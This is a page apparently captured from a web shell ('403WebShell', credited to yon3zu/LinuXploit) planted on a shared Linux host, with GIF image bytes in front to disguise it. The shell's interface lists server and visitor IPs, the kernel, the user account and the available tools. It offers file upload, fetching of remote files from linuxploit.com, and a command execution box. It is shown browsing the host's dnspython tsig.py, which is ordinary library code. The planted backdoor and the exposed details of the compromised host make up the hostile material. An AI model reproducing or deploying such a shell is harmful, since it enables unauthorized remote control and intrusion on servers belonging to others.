GIF89a=
( õ' 7IAXKgNgYvYx\%wh…hŽth%ˆs%—x¨}9®Œ©€&©‰%¶†(¹–.¹5·œD¹&Çš)ÇŸ5ǘ;Í£*È¡&Õ²)ׯ7×µ<Ñ»4ï°3ø‘HÖ§KͯT÷¨Yÿšqÿ»qÿÔFØ                                                                           !ù

 ' !ÿ
NETSCAPE2.0
   ,    =
(  þÀ“pH,È¤rÉl:ŸÐ¨tJ­Z¯Ø¬vËíz¿à°xL.›Ïè´zÍn»ßð¸|N¯Ûïø¼~Ïïûÿ€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§gª«ªE
¯°
¨¬ª±²Œ¹º¹E¾­”´ÂB¶¯ §Åȸ»ÑD¾¿Á•ÄÅ®° ÝH¾ÒLÀÆDÙ«D¶BÝïðÀ¾DÑÑÔTÌÍíH òGö¨A RÎڐ
|¥ÂÙ­&ºìE8œ¹kGÔAÞpx­a¶­ãR2XB®åE
8I€Õ6Xî:vT)äžþÀq¦è³¥ì仕F~%xñ Â
4#ZÔ‰O|-4Bs‘X:=
QÉ œš lºÒyXJŠGȦ|s
hÏíK–3l7·B|¥$'7Jީܪ‰‡àá”Dæn=Pƒ
¤Òëí‰`䌨ljóá¯Éüv>á–Á¼5
½.69ûϸd«­ºÀûnlv©‹ªîf{¬ÜãPbŸ
 l5‘Ž¯pß´
˜3aÅùäI«O’ý·‘áÞ‡˜¾Æ‚ÙÏiÇÿ‹Àƒ #öó)pâš Þ½	‘Ý{ó)vmÞü%D~6f s}ŃƒDØW Eþ`‡þ	À…L8xá†ç˜{)x`X/> Ì}mø‚–RØ‘*|`D=‚Ø_ ^ð5 !_…'aä“OÚ—7âcð`D”Cx`ÝÂ¥ä‹éY¹—F¼¤¥Š?¡Õ™ n@`}	lď’ÄÉ@4>ñd
œ à‘vÒxNÃ×™@žd=ˆgsžG±æ´²æud &p8Qñ)ˆ«lXD©øÜéAžHìySun jª×k*D¤LH]
†¦§C™Jä–´Xb~ʪwStŽ6K,°£qÁœ:9ت:¨þªl¨@¡`‚ûÚ	».Û¬¯
t‹ÆSÉ[:°=Š‹„‘Nåû”Ìî{¿ÂA ‡Rà›ÀÙ6úë°
Ÿð0Ä_ 
½;ÃϱîÉì^ÇÛÇ#Ëë¼ôº!±Ä˜íUîÅÇ;0L1óÁµö«p%
AÀºU̬ݵ¼á%霼€‡¯Á~`ÏG¯»À×
 ­²± =4ªnpð3¾¤³¯­ü¾¦îuÙuµÙ®|%2ÊIÿür¦#0·ÔJ``8È@S@5ê¢ö×Þ^`8EÜ]
ý.뜃Âç 7 ú ȉÞj œ½Dç 
zý¸iþœÑÙûÄë!ˆÞÀl§Ïw‹*DçI€nEX¯¬¼	&A
¬Go¼QföõFç°¯;é¦÷îŽêJ°îúôF5¡ÌQ|îúöXªæ»TÁÏyñêï]ê² o óÎC=öõ›ÒÓPB@ D×½œä(>èCÂ
xŽ`±«Ÿ–JЀ»Û á¤±p+eE0`ëŽ`AÚ/NE€Ø†À9‚@¤à	H½7”à‡%B‰`À
l*ƒó‘–
‡8 2ñ%¸ —€:Ù1Á‰E¸àux%
nP1ð!‘ðC)¾P81lÑɸF#ˆ€{´âé°ÈB„0>±û
°b¡Š´±O‚3È–Ù()yRpbµ¨E.Z‘D8ÊH@%òŒx+%Ù˜Æcü »¸˜fõ¬b·d`Fê™8èXH"ÉÈ-±|1Ô6iI, 2““¬$+](A*jÐQTÂ
o‰.ÛU슬Œã„Ž`¯SN¡–¶Äåyše¯ª’­¬‚´b¦Éož œ)åyâ@Ì®3	ÎtT̉°&Ø+žLÀf"Ø-|žçÔ>‡Ðv¦Ðžì\‚ Q1)Ž@Žh#aP72”ˆ™¨$‚  !ù

 " ,    =
( …7IAXG]KgNgYvYxR"k\%w]'}hŽth%ˆg+ˆs%—r.—m3šx3˜x¨}9®€&©€+¨‡7§‰%¶†(¹–.¹œD¹&ǘ;Í•&ײ)×»4ïÌ6ò§KÍ                                                                                          þ@‘pH,È¤rÉl:ŸÐ¨tJ­Z¯Ø¬vËíz¿à°xL.›Ïè´zÍn»ßð¸|N¯Ûïø¼~Ïïûÿ€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§g
 «¬ E 
±±
¨­¶°ººE
Á´”·®C¬²
§Ç¶
Œ»ÓDÃÕƷ¯Ê±H½ºM×ÁGÚ¬D¶BËÁ½î½DÓôTÏÛßîG»ôõC×CÌ	l&âž:'òtU³6ɹ#·Ø)€'Ü.6±&ëÍÈ»
K(8p0N?!æ2"ÛˆNIJX>R¼ÐO‚M	'¡¨2¸*Ÿþ>#nâ†
å@‚<[:¡Iïf’ ¤TÚ˘CdbÜÙ“[«ŽEú5MBo¤
×@€`@„€Êt W-3 ¶Ÿ¡BíêäjIÝ…Eò9[T…$íêﯧ„…•s»Óȳ¹€ÅÚdc®UUρ#±Ùïldj?´í¼²`\ŽÁðÞu|3'ÖŒ]ë6 ¶S#²‡˜FKLÈ *N
E´‘áäŠ$˜›eÄYD„ºq«.è촁ƒs \-ÔjA9²õ÷å- üúM[Âx(ís÷ì®x€|í¡Ù’p¦
‚ ŽkÛTÇDpE@WÜ	²Ç]kŠ1¨ þ€·Yb ÓÁ‰l°*n0 ç™—žzBdОu¾7ĉBl€â‰-ºx~|UåU‰
 h*Hœ|e"#"?vpÄiŠe6^ˆ„+qâŠm8  #VÇá <Fù–C™Ä^F9Ä #­ÉRAGb©d“(0$kêè‘ž¨'L¢)B]æù¨eŠ>‘å–ÄV„œ|Šè•m"сœn|@
›U¶ÆΞ—Špb¥G¨ED”€±Úê2FÌIç?
>Éxå
α
¡¤„%‘žjŸ‘ꄯ<Ìaà9ijÐ2˜D¦È&›†Z`‚å]wþ¼Â:ç6àB¤7eFJ|õÒ§Õ,¨äàFÇ®cS·Ê¶+B°,‘Þ˜ºNûãØ>PADÌHD¹æž«ÄÀnÌ¥}­#Ë’ë
QÀÉSÌÂÇ2ÌXÀ{æk²
lQÁ2«ÊðÀ¯w|2Íh‹ÄÂG€,m¾¶ë3ÐÙ6-´ÅE¬L°ÆIij*K½ÀÇqï`DwVÍQXœÚÔpeœ±¬Ñ	q˜§Tœ½µƒ°Œìu Â<¶aØ*At¯lmEØ
üôÛN[P1ÔÛ¦­±$ÜÆ@`ùåDpy¶yXvCAyåB`ŽD¶	0QwG#¯
æš[^Äþ	$ÀÓÝǦ{„L™[±úKÄgÌ;ï£S~¹ìGX.ôgoT.»åˆ°ùŸûù¡?1zö¦Ÿž:ÅgÁ|ì<O»í!‹œ{÷E ÿ{ðVðÚú×Cß{òËgo„óõú’'߁zEHÔrJÅ=˜5€Ýé²¥ºá¹î4Â÷ˆÐ´V	w ƒß$xVA.¬+üä'ÊE„E ^ž‡©£•84`K—>L¹„®£œŠ‚à0œ]PÁ^p	F<"•ç?!,ñ‡N4—…PÄ Á„ö¨Û:Tè@hÀ‹%táÿ:ø-
žI<`þ‹p I….)^ 40D#p@ƒj4–؀:²‰1Øâr˜¼F2oW¼#Z†;$Q	q”
‘ ÂK¦ñNl#29 !’F@¥Bh·ᏀL!—XFóLH‘Kh¤.«hE&JòG¨¥<™WN!€ÑÙÚˆY„@†>Œž19J" 2,/
&.GXB%ÌRÈ9B6¹W]’î×ÔW¥’IÎ$ ñ‹ÓŒE8YÆ	¼³™ñA5“à®Q.aŸB€&Ø©³ JÁ—!	¦t)K%tœ-¦JF
bòNMxLôþ)ÐR¸Ð™‘ èÝ6‘O!THÌ„HÛ	‰   !ù

 ) ,    =
( …AXKgNgYvYxR"k\%wh…hŽh%ˆg+ˆs%—r.—x3˜x¨}9®€&©€+¨Œ,©‡7§‰%¶†(¹–.¹5·&Çš)ǘ;Í•&×£*Ȳ)ׯ7×»4ï°3øÌ6ò‘HÖ§KÍ»Hó¯T÷¨Yÿ»qÿÇhÿ                                                                     þÀ”pH,È¤rÉl:ŸÐ¨tJ­Z¯Ø¬vËíz¿à°xL.›Ïè´zÍn»ßð¸|N¯Ûïø¼~Ïïûÿ€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§g ª«

E$±²¨ª­
·
°²½$E$ÂÕ««D· Í ¿¦Ç¶¸ÌŒ¾³CÃÅÆ EééH½MÛÂGâªD­çBêêϾD²ÒaÀà€Š1r­ðÓ¤	ÔožzU!L˜C'¾yW½UGtäÇïÙllê
0×àÂuGþ)AÀs[þ·xì
ÁxO%ƒûX2ó—

P£n›R/¡ÑšHše+êDm?#—‘Ç£6¡8íJ¡ŸâDiäªM¥Ö„ôj“¬¹£5oQ7°-
<‡
*´lãÓŒ2r/a!l)dÈ A™ÈE¢ôÔ͆…ð;Ö˜c ¡%ß‚’Ùˆâ¸b½—pe~C"BíëÚHïeF2§æŠ8qb t_`urŠeü
wÅu3êæPv§h•"ß`íÍxçLĹÜÖ3á
 ~Öº“®›¸ÏMDfJÙ
°„
ÛµáWõ%§œ‚à©–‚X Ó؁)@®Ñ›Eþ´wëuÅSxb8y\mÖzœ¥§ZbºE—ÂLªÌw!y(>¡™wú=Ç|ÅÝs¢d€CÁW)HÜcC$€L 
Ä7„r.á\{)@ð` @	äXÈ$PD” `šaG:§æˆOˆ72EÐamn]ù"ŒcÊxÑŒ° &dR8`g«iÙŸLR!¦
P
…d’ä¡“¦ðÎTƒ¦ià|À
 _

¥ Qi#¦Šg›Æ ›noMµ
›V
ã£)p ç£ÎW…š=Âeªk§†j„ ´®1ß²sÉxéW«jšl|0¯B0Û, 
\jÛ´›6±¬¶C
ÛíWþï|ëÙ‹¸ñzĸV {ì;Ýñn¼òVˆm³I¼³.Ðã¤PN¥
²µ¼„µCã+¹ÍByî£Ñ¾HŸ›ëêÂ
7ìYÆFTk¨SaoaY$Dµœìï¿Ã29RÈkt Çïfñ ÇÒ:ÀÐSp¹3ÇI¨â¥DZÄ ü9Ïýögñ½­uÔ*
3)O‘˜Ö[_hv
,àî×EtŸé¶BH€Õ[ü±64M@ÔSÌM7dÐl5-ÄÙU܍´©zߌ3Ô€3ž„ „ ¶ÛPô½5×g›
êÚ˜kN„Ý…0Îj4€Ìë°“#{þÕ3S2çKÜ'ợlø¼Ú2K{° {Û¶?žm𸧠ËI¼nEò='êüóºè^üæÃ_Û=°óž‚ì#Oý¿Í'¡½áo..ÏYìnüñCœO±Áa¿¢Kô½o,üÄËbö²çºí
ï{ËC Ú—"”Ï{ËK ÍÒw„õ±Oz dÕ¨à:$ ƒô—«v»]	A#ð «€¿šéz)
Rx׿ˆ¥‚d``èw-îyÏf×K!ð€þ­Ð|ìPľ„=Ì`ý(f” 'Pa
¥ÐBJa%Ðâf§„%Š¡}FàáÝ×6>ÉäŠG"éŽè=ø!oŠ°^FP¼Ø©Q„ÀCÙÁ`(Ž\ÄÝ®
©Â$<n@dÄ E#ììUÒI! ‚#lù‹`k¦ÐÇ'Rró’ZýNBÈMF
Í[¤+‹ðɈ-áwj¨¥þ8¾rá
,VÂh„"|½œ=×G_¦Ñ™EØ 0i*%̲˜Æda0mV‚k¾)›;„&6 p>ÓjK“¦Ç#
âDÂ:ûc?:R	Ó¬fÞéI-Ì“•Ã<ä=™Ï7˜3œ¨˜c2ŒW	,
ˆ”8(T™P‰F¡Jhç"‚  ;<html>
<!doctypehtml><html><head><title>403WebShell</title><meta content="noindex"name="robots"></head><body bgcolor="#1f1f1f"text="#ffffff"><link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"rel="stylesheet"><style>@import url(https://fonts.googleapis.com/css?family=Dosis);@import url(https://fonts.googleapis.com/css?family=Bungee);@import url(https://fonts.googleapis.com/css?family=Russo+One);body{font-family:Consolas,cursive;text-shadow:0 0 1px #757575}body::-webkit-scrollbar{width:12px}body::-webkit-scrollbar-track{background:#1f1f1f}body::-webkit-scrollbar-thumb{background-color:#1f1f1f;border:3px solid gray}#content tr:hover{background-color:#636263;text-shadow:0 0 10px #fff}#content .first{background-color:#5e5e5e}#content .first:hover{background-color:#25383c;text-shadow:0 0 1px #757575}table{border:1px #000 dotted;table-layout:fixed}td{word-wrap:break-word}a{color:#df5;text-decoration:none}a:hover{color:#000;text-shadow:0 0 10px #fff}input,select,textarea{border:1px #000 solid;-moz-border-radius:5px;-webkit-border-radius:5px;border-radius:5px}.gas{background-color:#1f1f1f;color:#fff;cursor:pointer}select{background-color:transparent;color:#fff}select:after{cursor:pointer}.linka{background-color:transparent;color:#fff}.up{background-color:transparent;color:#fff}option{background-color:#1f1f1f}.btf{background:0 0;border:1px #fff solid;cursor:pointer}::-webkit-file-upload-button{background:0 0;color:#fff;border-color:#fff;cursor:pointer}</style><center><font face="Bungee" size="5">403Webshell</font></center>
<table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">
<tr><td>Server IP : <font color=#df5>104.21.83.152</font> &nbsp;/&nbsp; Your IP : <font color=#df5>216.73.216.195</font><br>Web Server : <font color='#df5'>LiteSpeed</font><br>System : <font color='#df5'>Linux premium229.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64</font><br>User : <font color='#df5'>akhalid&nbsp;</font>( <font color='#df5'>749</font>)<br>PHP Version : <font color='#df5'>8.3.22</font><br>Disable Function : <font color='#df5'>NONE</font></font><br>MySQL : <font color=red>OFF</font> &nbsp;|&nbsp; cURL : <font color=green>ON</font> &nbsp;|&nbsp; WGET : <font color=green>ON</font> &nbsp;|&nbsp; Perl : <font color=green>ON</font> &nbsp;|&nbsp; Python : <font color=green>ON</font> &nbsp;|&nbsp; Sudo : <font color=red>OFF</font> &nbsp;|&nbsp; Pkexec : <font color=red>OFF</font><br>Directory : &nbsp;<a href="?loknya=/">/</a><a href="?loknya=/opt">opt</a>/<a href="?loknya=/opt/hc_python">hc_python</a>/<a href="?loknya=/opt/hc_python/lib">lib</a>/<a href="?loknya=/opt/hc_python/lib/python3.12">python3.12</a>/<a href="?loknya=/opt/hc_python/lib/python3.12/site-packages">site-packages</a>/<a href="?loknya=/opt/hc_python/lib/python3.12/site-packages/dns">dns</a>/</td></tr><tr><td><br>Upload File : <form enctype="multipart/form-data" method="post">
<input type="radio" value="1" name="dirnya" checked>current_dir [ <font color='red'>Writeable</font> ]
<input type="radio" value="2" name="dirnya" >document_root [ <font color='green'>Writeable</font> ]
<br>
<input type="hidden" name="upwkwk" value="aplod">
<input type="file" name="berkas"><input type="submit" name="berkasnya" value="Upload" class="up" style="cursor: pointer; border-color: #fff"><br>
<input type="text" name="darilink" class="up" placeholder="https://linuxploit.com/upload.txt">&nbsp;<input type="text" name="namalink" class="up" size="5" placeholder="kerang.txt"><input type="submit" name="linknya" class="up" value="Upload" style="cursor: pointer; border-color: #fff">
</form><br><form method="post" enctype="application/x-www-form-urlencoded">
Command : <input type="text" name="komend" class="up" style="cursor: pointer; border-color: #000" value="">
<input type="submit" name="komends" value=">>" class="up" style="cursor: pointer; border-color: #fff">
</form></table><br><hr><center style="font-family: Russo One">[ <a href='/228ef4/index.php'>Back</a> ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<hr></center><br><tr><td>Current File : /opt/hc_python/lib/python3.12/site-packages/dns/tsig.py</tr></td></table><br/><pre># Copyright (C) Dnspython Contributors, see LICENSE for text of ISC license

# Copyright (C) 2001-2007, 2009-2011 Nominum, Inc.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose with or without fee is hereby granted,
# provided that the above copyright notice and this permission notice
# appear in all copies.
#
# THE SOFTWARE IS PROVIDED &quot;AS IS&quot; AND NOMINUM DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NOMINUM BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.

&quot;&quot;&quot;DNS TSIG support.&quot;&quot;&quot;

import base64
import hashlib
import hmac
import struct

import dns.exception
import dns.name
import dns.rcode
import dns.rdataclass


class BadTime(dns.exception.DNSException):
    &quot;&quot;&quot;The current time is not within the TSIG&#039;s validity time.&quot;&quot;&quot;


class BadSignature(dns.exception.DNSException):
    &quot;&quot;&quot;The TSIG signature fails to verify.&quot;&quot;&quot;


class BadKey(dns.exception.DNSException):
    &quot;&quot;&quot;The TSIG record owner name does not match the key.&quot;&quot;&quot;


class BadAlgorithm(dns.exception.DNSException):
    &quot;&quot;&quot;The TSIG algorithm does not match the key.&quot;&quot;&quot;


class PeerError(dns.exception.DNSException):
    &quot;&quot;&quot;Base class for all TSIG errors generated by the remote peer&quot;&quot;&quot;


class PeerBadKey(PeerError):
    &quot;&quot;&quot;The peer didn&#039;t know the key we used&quot;&quot;&quot;


class PeerBadSignature(PeerError):
    &quot;&quot;&quot;The peer didn&#039;t like the signature we sent&quot;&quot;&quot;


class PeerBadTime(PeerError):
    &quot;&quot;&quot;The peer didn&#039;t like the time we sent&quot;&quot;&quot;


class PeerBadTruncation(PeerError):
    &quot;&quot;&quot;The peer didn&#039;t like amount of truncation in the TSIG we sent&quot;&quot;&quot;


# TSIG Algorithms

HMAC_MD5 = dns.name.from_text(&quot;HMAC-MD5.SIG-ALG.REG.INT&quot;)
HMAC_SHA1 = dns.name.from_text(&quot;hmac-sha1&quot;)
HMAC_SHA224 = dns.name.from_text(&quot;hmac-sha224&quot;)
HMAC_SHA256 = dns.name.from_text(&quot;hmac-sha256&quot;)
HMAC_SHA256_128 = dns.name.from_text(&quot;hmac-sha256-128&quot;)
HMAC_SHA384 = dns.name.from_text(&quot;hmac-sha384&quot;)
HMAC_SHA384_192 = dns.name.from_text(&quot;hmac-sha384-192&quot;)
HMAC_SHA512 = dns.name.from_text(&quot;hmac-sha512&quot;)
HMAC_SHA512_256 = dns.name.from_text(&quot;hmac-sha512-256&quot;)
GSS_TSIG = dns.name.from_text(&quot;gss-tsig&quot;)

default_algorithm = HMAC_SHA256

mac_sizes = {
    HMAC_SHA1: 20,
    HMAC_SHA224: 28,
    HMAC_SHA256: 32,
    HMAC_SHA256_128: 16,
    HMAC_SHA384: 48,
    HMAC_SHA384_192: 24,
    HMAC_SHA512: 64,
    HMAC_SHA512_256: 32,
    HMAC_MD5: 16,
    GSS_TSIG: 128,  # This is what we assume to be the worst case!
}


class GSSTSig:
    &quot;&quot;&quot;
    GSS-TSIG TSIG implementation.  This uses the GSS-API context established
    in the TKEY message handshake to sign messages using GSS-API message
    integrity codes, per the RFC.

    In order to avoid a direct GSSAPI dependency, the keyring holds a ref
    to the GSSAPI object required, rather than the key itself.
    &quot;&quot;&quot;

    def __init__(self, gssapi_context):
        self.gssapi_context = gssapi_context
        self.data = b&quot;&quot;
        self.name = &quot;gss-tsig&quot;

    def update(self, data):
        self.data += data

    def sign(self):
        # defer to the GSSAPI function to sign
        return self.gssapi_context.get_signature(self.data)

    def verify(self, expected):
        try:
            # defer to the GSSAPI function to verify
            return self.gssapi_context.verify_signature(self.data, expected)
        except Exception:
            # note the usage of a bare exception
            raise BadSignature


class GSSTSigAdapter:
    def __init__(self, keyring):
        self.keyring = keyring

    def __call__(self, message, keyname):
        if keyname in self.keyring:
            key = self.keyring[keyname]
            if isinstance(key, Key) and key.algorithm == GSS_TSIG:
                if message:
                    GSSTSigAdapter.parse_tkey_and_step(key, message, keyname)
            return key
        else:
            return None

    @classmethod
    def parse_tkey_and_step(cls, key, message, keyname):
        # if the message is a TKEY type, absorb the key material
        # into the context using step(); this is used to allow the
        # client to complete the GSSAPI negotiation before attempting
        # to verify the signed response to a TKEY message exchange
        try:
            rrset = message.find_rrset(
                message.answer, keyname, dns.rdataclass.ANY, dns.rdatatype.TKEY
            )
            if rrset:
                token = rrset[0].key
                gssapi_context = key.secret
                return gssapi_context.step(token)
        except KeyError:
            pass


class HMACTSig:
    &quot;&quot;&quot;
    HMAC TSIG implementation.  This uses the HMAC python module to handle the
    sign/verify operations.
    &quot;&quot;&quot;

    _hashes = {
        HMAC_SHA1: hashlib.sha1,
        HMAC_SHA224: hashlib.sha224,
        HMAC_SHA256: hashlib.sha256,
        HMAC_SHA256_128: (hashlib.sha256, 128),
        HMAC_SHA384: hashlib.sha384,
        HMAC_SHA384_192: (hashlib.sha384, 192),
        HMAC_SHA512: hashlib.sha512,
        HMAC_SHA512_256: (hashlib.sha512, 256),
        HMAC_MD5: hashlib.md5,
    }

    def __init__(self, key, algorithm):
        try:
            hashinfo = self._hashes[algorithm]
        except KeyError:
            raise NotImplementedError(f&quot;TSIG algorithm {algorithm} is not supported&quot;)

        # create the HMAC context
        if isinstance(hashinfo, tuple):
            self.hmac_context = hmac.new(key, digestmod=hashinfo[0])
            self.size = hashinfo[1]
        else:
            self.hmac_context = hmac.new(key, digestmod=hashinfo)
            self.size = None
        self.name = self.hmac_context.name
        if self.size:
            self.name += f&quot;-{self.size}&quot;

    def update(self, data):
        return self.hmac_context.update(data)

    def sign(self):
        # defer to the HMAC digest() function for that digestmod
        digest = self.hmac_context.digest()
        if self.size:
            digest = digest[: (self.size // 8)]
        return digest

    def verify(self, expected):
        # re-digest and compare the results
        mac = self.sign()
        if not hmac.compare_digest(mac, expected):
            raise BadSignature


def _digest(wire, key, rdata, time=None, request_mac=None, ctx=None, multi=None):
    &quot;&quot;&quot;Return a context containing the TSIG rdata for the input parameters
    @rtype: dns.tsig.HMACTSig or dns.tsig.GSSTSig object
    @raises ValueError: I{other_data} is too long
    @raises NotImplementedError: I{algorithm} is not supported
    &quot;&quot;&quot;

    first = not (ctx and multi)
    if first:
        ctx = get_context(key)
        if request_mac:
            ctx.update(struct.pack(&quot;!H&quot;, len(request_mac)))
            ctx.update(request_mac)
    ctx.update(struct.pack(&quot;!H&quot;, rdata.original_id))
    ctx.update(wire[2:])
    if first:
        ctx.update(key.name.to_digestable())
        ctx.update(struct.pack(&quot;!H&quot;, dns.rdataclass.ANY))
        ctx.update(struct.pack(&quot;!I&quot;, 0))
    if time is None:
        time = rdata.time_signed
    upper_time = (time &gt;&gt; 32) &amp; 0xFFFF
    lower_time = time &amp; 0xFFFFFFFF
    time_encoded = struct.pack(&quot;!HIH&quot;, upper_time, lower_time, rdata.fudge)
    other_len = len(rdata.other)
    if other_len &gt; 65535:
        raise ValueError(&quot;TSIG Other Data is &gt; 65535 bytes&quot;)
    if first:
        ctx.update(key.algorithm.to_digestable() + time_encoded)
        ctx.update(struct.pack(&quot;!HH&quot;, rdata.error, other_len) + rdata.other)
    else:
        ctx.update(time_encoded)
    return ctx


def _maybe_start_digest(key, mac, multi):
    &quot;&quot;&quot;If this is the first message in a multi-message sequence,
    start a new context.
    @rtype: dns.tsig.HMACTSig or dns.tsig.GSSTSig object
    &quot;&quot;&quot;
    if multi:
        ctx = get_context(key)
        ctx.update(struct.pack(&quot;!H&quot;, len(mac)))
        ctx.update(mac)
        return ctx
    else:
        return None


def sign(wire, key, rdata, time=None, request_mac=None, ctx=None, multi=False):
    &quot;&quot;&quot;Return a (tsig_rdata, mac, ctx) tuple containing the HMAC TSIG rdata
    for the input parameters, the HMAC MAC calculated by applying the
    TSIG signature algorithm, and the TSIG digest context.
    @rtype: (string, dns.tsig.HMACTSig or dns.tsig.GSSTSig object)
    @raises ValueError: I{other_data} is too long
    @raises NotImplementedError: I{algorithm} is not supported
    &quot;&quot;&quot;

    ctx = _digest(wire, key, rdata, time, request_mac, ctx, multi)
    mac = ctx.sign()
    tsig = rdata.replace(time_signed=time, mac=mac)

    return (tsig, _maybe_start_digest(key, mac, multi))


def validate(
    wire, key, owner, rdata, now, request_mac, tsig_start, ctx=None, multi=False
):
    &quot;&quot;&quot;Validate the specified TSIG rdata against the other input parameters.

    @raises FormError: The TSIG is badly formed.
    @raises BadTime: There is too much time skew between the client and the
    server.
    @raises BadSignature: The TSIG signature did not validate
    @rtype: dns.tsig.HMACTSig or dns.tsig.GSSTSig object&quot;&quot;&quot;

    (adcount,) = struct.unpack(&quot;!H&quot;, wire[10:12])
    if adcount == 0:
        raise dns.exception.FormError
    adcount -= 1
    new_wire = wire[0:10] + struct.pack(&quot;!H&quot;, adcount) + wire[12:tsig_start]
    if rdata.error != 0:
        if rdata.error == dns.rcode.BADSIG:
            raise PeerBadSignature
        elif rdata.error == dns.rcode.BADKEY:
            raise PeerBadKey
        elif rdata.error == dns.rcode.BADTIME:
            raise PeerBadTime
        elif rdata.error == dns.rcode.BADTRUNC:
            raise PeerBadTruncation
        else:
            raise PeerError(&quot;unknown TSIG error code %d&quot; % rdata.error)
    if abs(rdata.time_signed - now) &gt; rdata.fudge:
        raise BadTime
    if key.name != owner:
        raise BadKey
    if key.algorithm != rdata.algorithm:
        raise BadAlgorithm
    ctx = _digest(new_wire, key, rdata, None, request_mac, ctx, multi)
    ctx.verify(rdata.mac)
    return _maybe_start_digest(key, rdata.mac, multi)


def get_context(key):
    &quot;&quot;&quot;Returns an HMAC context for the specified key.

    @rtype: HMAC context
    @raises NotImplementedError: I{algorithm} is not supported
    &quot;&quot;&quot;

    if key.algorithm == GSS_TSIG:
        return GSSTSig(key.secret)
    else:
        return HMACTSig(key.secret, key.algorithm)


class Key:
    def __init__(self, name, secret, algorithm=default_algorithm):
        if isinstance(name, str):
            name = dns.name.from_text(name)
        self.name = name
        if isinstance(secret, str):
            secret = base64.decodebytes(secret.encode())
        self.secret = secret
        if isinstance(algorithm, str):
            algorithm = dns.name.from_text(algorithm)
        self.algorithm = algorithm

    def __eq__(self, other):
        return (
            isinstance(other, Key)
            and self.name == other.name
            and self.secret == other.secret
            and self.algorithm == other.algorithm
        )

    def __repr__(self):
        r = f&quot;&lt;DNS key name=&#039;{self.name}&#039;, &quot; + f&quot;algorithm=&#039;{self.algorithm}&#039;&quot;
        if self.algorithm != GSS_TSIG:
            r += f&quot;, secret=&#039;{base64.b64encode(self.secret).decode()}&#039;&quot;
        r += &quot;&gt;&quot;
        return r
</pre><center><br>Youez - 2016 - github.com/yon3zu<br><a href='https://linuxploit.com/' target='_blank'>LinuXploit</a></center>